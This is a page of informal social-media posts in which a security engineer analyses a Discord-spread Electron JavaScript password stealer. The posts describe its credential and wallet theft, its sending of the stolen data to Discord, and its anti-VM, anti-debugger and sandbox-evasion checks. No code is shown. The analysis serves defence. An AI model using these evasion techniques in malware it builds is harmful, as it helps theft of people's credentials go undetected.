Notices by Foone🏳️‍⚧️ (foone@digipres.club), page 4

whenever you find the worst pits of the internet, you will find cloudflare there, quietly making money off it.

it also refuses to run if your external IP is one of a couple, which include a hungarian ISP, a couple IPs in moscow, and azure

it is also apparently dumping these stolen passwords into a discord somewhere, and if it steals your wallet password it dumps it with "🤡 Leet Stealer"

even the bad guys think you're a clown for using cryptocurrency

on a day with no ADHD meds, my roommate knocks on the door and is like "a friend got their discord hacked but before I knew it they sent me an EXE and I ran it. am I hacked?"

seems it is an electron based javascript malware that tries to steal all your passwords from all your browsers

I am some kind of reverse engineer/security engineer but I'm not very good at it WHEN MY BRAIN DOESN'T WORK

huh, one of the things it does is check your RAM speed.

I think because that's a thing real computers have, and it's trying to do a roundabout VM check?

it even checks against OllyDbg, a really great debugger that hasn't updated in 11 years

but yeah it does a bunch of checks to see if anything remotely debuggy or VMy is running or even installed, then refuses to do stuff

I'm looking at this disassembly from dez_ on twitter.

https://gist.github.com/joe-desimone/64b3c1044c184ffc8f26090d7bcd32b5

yes let me accidentally try to unpack the electron app in poland, that's exactly the kind of protection I need: geographic protection

there's a lot of very specific checks before it tries to do anything, I think this has been carefully designed to appear innocuous to the commonly used online sandboxes. like, it detects if it's running on virustotal and throws an error, instead of doing anything sneaky-deaky

god I bet there are some malware out there that checks your location on GPS before running, and errors out if you're too close to Known Antivirus companies

OH GOOD this is a different version that uses aes compression. so the source isn't just obfuscated, it's actually encrypted.

sure there's work-from-home, but you're probably still within a reasonable driving distance of the office. they could just blacklist the entire metropolitan area

I hope these fuckers aren't trying to obfuscate the password by abusing javascript scoping

finally unencrypted and re-deobfuscated.

and it's got debugging strings in Turkish!

my head already hurts enough as it is

awfully lot of debugging information printed to console.log by this malware. it really tells you everything it is doing

so it also checks your GPU.

You know, because VMs usually have a GPU like "VMware SVGA 3D"